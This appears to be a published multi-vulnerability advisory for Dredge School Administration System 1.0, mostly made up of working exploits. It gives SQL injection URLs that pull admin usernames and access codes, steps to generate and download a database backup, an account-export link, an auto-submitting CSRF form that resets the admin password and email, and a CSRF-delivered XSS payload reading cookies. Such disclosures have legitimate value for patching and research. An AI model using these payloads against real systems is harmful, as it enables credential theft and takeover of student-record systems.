Dredge School Administration System 1.0 SQL Injection / XSS / CSRF

`Dredge School Administration System V1.0 - Multiple Vulnerabilties  
====================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://sourceforge.net/projects/studentrecord/  
####################################################################  
  
I. Sql Injection  
  
######################################  
VULNERABILITY: CLASSIC MYSQL INJECTION  
######################################  
  
/loader.php (LINE: 10-17)  
  
-----------------------------------------------------------------------------  
$searchwords = $_GET['load'];  
$searchwords = stripslashes($searchwords);  
$searchwords = strip_tags($searchwords);  
$searchwords = trim($searchwords, "'");  
$load = $_GET['load'];  
mysql_select_db($database_drsa, $drsa);  
$query_file = "SELECT * FROM system WHERE system_name = '$searchwords'";  
$file = mysql_query($query_file, $drsa);  
  
-----------------------------------------------------------------------------  
  
#####################################################  
EXPLOIT  
#####################################################  
  
http://localhost/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff  
  
http://localhost/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff  
  
http://localhost/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff  
  
ETC.......  
  
  
  
II. Backup Download  
  
##############  
VULNERABILITY  
##############  
  
/Backup/processbackup.php (LINE: 89-93)  
  
-----------------------------------------------------------------------------  
//save file  
// $handle =  
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');  
$handle = fopen('RecordManager.sql','w+');  
fwrite($handle,$return);  
fclose($handle);  
  
-----------------------------------------------------------------------------  
  
#####################################################  
EXPLOIT  
#####################################################  
  
1. Open http://localhost/DSM/Backup/processbackup.php  
2. When you open the link produces RecordManager.sql  
3. to download backup [http://localhost/DSM/Backup/RecordManager.sql]  
  
  
  
III. Accounts Disclosure  
  
<html>  
<title>Iphobos Blog</title>  
<label><a href="http://localhost/DSM/loader.php?load=data export  
send&tableid=3" class="button white">Export Accounts</a></label>  
</html>  
  
  
IV. Cross Site Request Forgery  
  
[Change Password & Email Admin]  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="  
http://localhost/DSM/loader.php?load=account settings">  
<input type="hidden" name="AccessCode" value="123456" />  
<input type="hidden" name="ConfirmAccessCode" value="123456" />  
<input type="hidden" name="Email" value="[email protected]" />  
<input type="hidden" name="MM_update" value="form2" />  
</form>  
</body>  
</html>  
  
  
V. Cross Site Scripting  
  
[CSRF with XSS Exploit]  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="  
http://localhost/DSM/loader.php?load=new subject">  
<input type="hidden" name="Code"  
value="<script>alert(document.cookie);</script>" />  
<input type="hidden" name="Description" value="Iphobos Blog" />  
<input type="hidden" name="MM_insert" value="form1" />  
</form>  
</body>  
</html>  
  
  
####################################################################  
####################################################################  
`